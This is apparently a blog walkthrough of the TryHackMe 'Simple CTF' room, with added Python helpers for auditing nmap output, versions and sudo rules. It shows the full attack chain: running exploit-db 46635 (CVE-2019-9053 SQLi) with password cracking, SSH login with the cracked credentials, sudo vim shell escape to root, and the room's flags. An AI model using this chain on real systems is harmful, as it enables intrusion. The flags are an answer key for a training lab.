  • Kaushal Patel

TryHackMe: Simple CTF Walkthrough

Updated: Jul 29, 2020


Hello Readers! Today I am going to walk through and write up one of the TryHackMe rooms, called “Simple CTF”.

Deploy


Let’s deploy the machine.

First things first! Once you have deployed the machine and connected to the TryHackMe VPN, we are ready to begin.


There are around 10 questions to answer. Let's go through them step by step.


#1 How many services are running under port 1000?

To answer this question you need to scan the machine with the tool called “nmap”. I used the command nmap -p1-65535 <IP> for the scan. The answer is 2: two services are running under port 1000.


#2 What is running on the higher port?

This answer is in the same nmap scan we did before. SSH is running on the higher port.
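Questions 1 and 2 are both answered from the scan, and for a full 65535-port scan it is easier to let a small script read the grepable output (nmap -oG) than to eyeball it. The script below is an added example, not part of the original write-up; the scan text it parses is a constructed sample in the grepable format, not the room's real output, and the ports in it are invented.

```python
import re

# Constructed sample of nmap "grepable" output (-oG). It is NOT the room's real
# scan output; the ports and services are invented to exercise the parser.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated as: nmap -p1-65535 -oG scan.gnmap 10.10.10.10
Host: 10.10.10.10 ()\tStatus: Up
Host: 10.10.10.10 ()\tPorts: 21/open/tcp//ftp///, 80/open/tcp//http///, 2222/open/tcp//ssh///\tIgnored State: closed (65532)
# Nmap done -- 1 IP address (1 host up) scanned
"""

# One grepable port entry is: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_open_ports(gnmap_text):
    """Return [(port, proto, service), ...] for every open port in grepable nmap output."""
    found = []
    for line in gnmap_text.splitlines():
        if "Ports:" not in line:
            continue
        for port, state, proto, _owner, service, _rpc, _version in PORT_RE.findall(line):
            if state == "open":  # skip closed/filtered entries nmap may list
                found.append((int(port), proto, service))
    return sorted(found)


def count_services_under(ports, limit=1000):
    """Question 1: how many open services sit below `limit`?"""
    return sum(1 for port, _proto, _service in ports if port < limit)


def highest_port_service(ports):
    """Question 2: which service answers on the highest open port?"""
    port, _proto, service = max(ports, key=lambda entry: entry[0])
    return port, service


if __name__ == "__main__":
    open_ports = parse_open_ports(SAMPLE_GNMAP)
    print("open ports:", open_ports)
    print("services under 1000:", count_services_under(open_ports))
    print("highest port:", highest_port_service(open_ports))
```

Run the real scan with nmap -p1-65535 -oG scan.gnmap <IP> and pass the file contents to parse_open_ports; the two helper functions then give the answers to questions 1 and 2 directly.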


#3 What’s the CVE you’re using against the application?

For this question, we run gobuster to enumerate the available URL directories.

gobuster dir -u http://<IP-MACHINE>/ -w /usr/share/dirb/wordlists/common.txt


Gobuster result:

/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/simple (Status: 301)


After visiting each directory, I found the “/simple” one interesting: there is a CMS Made Simple application inside!


I googled “cms made simple exploit” and found that there are plenty of them.



I looked up the specific injection I had found and got it from exploit-db.com. Here is the link to the exploitation script.

https://www.exploit-db.com/exploits/46635

The answer is CVE-2019-9053.



We also found that the running version is < 2.2.10, so this exploit is going to work against this site.
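Checking "version < 2.2.10" is where a lot of quick scripts go wrong: a plain string comparison says "2.2.9" is newer than "2.2.10" because it compares "9" against "1". The helper below is an added example, not code from the write-up or the exploit-db script; the banner text it parses is a constructed sample, and 2.2.10 is taken from the exploit-db entry referenced above as the first unaffected release.

```python
import re

# Versions below this release are affected, per the exploit-db entry referenced above.
FIXED_VERSION = "2.2.10"

# First dotted version number in a banner, page footer or changelog snippet.
VERSION_RE = re.compile(r"(\d+(?:\.\d+)+)")


def version_from_text(text):
    """Pull the first dotted version number out of a text snippet (None if absent)."""
    match = VERSION_RE.search(text)
    return match.group(1) if match else None


def parse_version(version):
    """'2.2.9' -> (2, 2, 9); tuples compare component by component, as versions should."""
    return tuple(int(part) for part in version.strip().split("."))


def is_affected(version, fixed=FIXED_VERSION):
    """True when `version` is older than the fixed release."""
    return parse_version(version) < parse_version(fixed)


def naive_string_compare(version, fixed=FIXED_VERSION):
    """The wrong way: lexical comparison, shown here only to expose the pitfall."""
    return version < fixed


if __name__ == "__main__":
    # Constructed sample banner, not text taken from the target.
    banner = "CMS Made Simple version 2.2.9 (constructed sample banner)"
    found = version_from_text(banner)
    print(found, "affected:", is_affected(found), "string compare says:", naive_string_compare(found))
```

The same pattern applies to any "fixed in X.Y.Z" check during a pentest or a patch audit: extract, split into integers, then compare tuples.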


#4 To what kind of vulnerability is the application vulnerable?

From the research I have done, I know that the attack here is SQL Injection (SQLi).


#5 What’s the password?

First, I read the documentation about the SQL injection. When I scrolled down the page, I saw a Python script. I copied the script into a file and named it 46635.py.



Make sure Python is installed on your operating system before performing this step.


The command I executed was python 46635.py -u http://<Machine-IP>/ --crack -w /usr/share/wordlists/rockyou.txt, which gave me the username mitch and the password secret.


So the mitch account is available on the target.


#6 Where can you login with the details obtained?

From the earlier nmap scan we know which ports are open and which services are behind them, so we know that SSH is listening on port 2222. With this information we can SSH into the machine:

ssh {username_script_found}@{machine_ip} -p 2222

The answer to the question is SSH.



#7 What’s the user flag?

Once you have a shell, it’s time to see what is inside.

ls -la

You will notice a user.txt file.

cat user.txt

Answer is G00d j0b, keep up!


#8 Is there any other user in the home directory? What’s its name?

cd /home

ls

mitch & sunbath


#9 What can you leverage to spawn a privileged shell?

Running the “sudo -l” command shows that we can run vim with sudo, which we can use to gain root access.

Go to the GTFOBins site and search for vim under sudo; you will get the command to gain root access.

sudo vim -c ':!/bin/sh'
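The same "sudo -l" output that hands an attacker a root shell is what an administrator should be auditing: a sudo rule on an editor is a sudo rule on a shell. The script below is an added example, not part of the write-up or of any sudo tooling; the "sudo -l" text it parses is a constructed sample, not the room's output, and the flagged-binary set is deliberately limited to the editor class this step discusses (GTFOBins, which the write-up already points to, is the complete catalogue).

```python
import os
import re

# Constructed sample of `sudo -l` output. It is NOT the room's actual output;
# the rules are invented to exercise the audit.
SAMPLE_SUDO_L = """\
Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/sbin/service apache2 restart
"""

# Editors can run a shell or open any file, so sudo on an editor is sudo on a shell.
# Limited on purpose to the vi/vim family discussed above.
EDITOR_BINARIES = {"vi", "vim", "vim.basic", "vim.tiny"}

# Rule line: "(runas) TAG: TAG: command, command"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_rules(text):
    """Turn the rule lines of `sudo -l` into dicts with runas, tags and command."""
    rules = []
    for line in text.splitlines():
        match = RULE_RE.match(line)
        if not match:  # Defaults and header lines carry no "(runas)" prefix
            continue
        tags = {tag.rstrip(":") for tag in match.group("tags").split()}
        for cmd in match.group("cmds").split(","):
            rules.append({"runas": match.group("runas").strip(), "tags": tags, "command": cmd.strip()})
    return rules


def audit_rules(rules):
    """Return (command, reason, fix) for every rule that amounts to a root shell."""
    findings = []
    for rule in rules:
        cmd = rule["command"]
        if cmd == "ALL":
            findings.append((cmd, "unrestricted root", "limit the rule to specific commands"))
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary in EDITOR_BINARIES:
            reason = "editor can spawn a shell as " + (rule["runas"] or "root")
            if "NOPASSWD" in rule["tags"]:
                reason += " without a password"
            # sudoedit runs the editor as the invoking user and only copies the file as root
            findings.append((cmd, reason, "drop the rule; use sudoedit for privileged file edits"))
    return findings


if __name__ == "__main__":
    for command, reason, fix in audit_rules(parse_sudo_rules(SAMPLE_SUDO_L)):
        print(f"{command}: {reason} -> {fix}")
```

On a real host, feed it the output of sudo -l for each account (or walk /etc/sudoers and /etc/sudoers.d as root); a finding against vim is exactly the misconfiguration this room leverages, and the fix is to remove the rule or switch to sudoedit.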



#10 What’s the root flag?

cd /root

ls

root.txt

cat root.txt

W3ll d0n3. You made it!



Thank you for reading! I hope you find this walk-through useful. If there is something you would like to add, or any suggestions, you can contact me anytime.


Happy Learning!
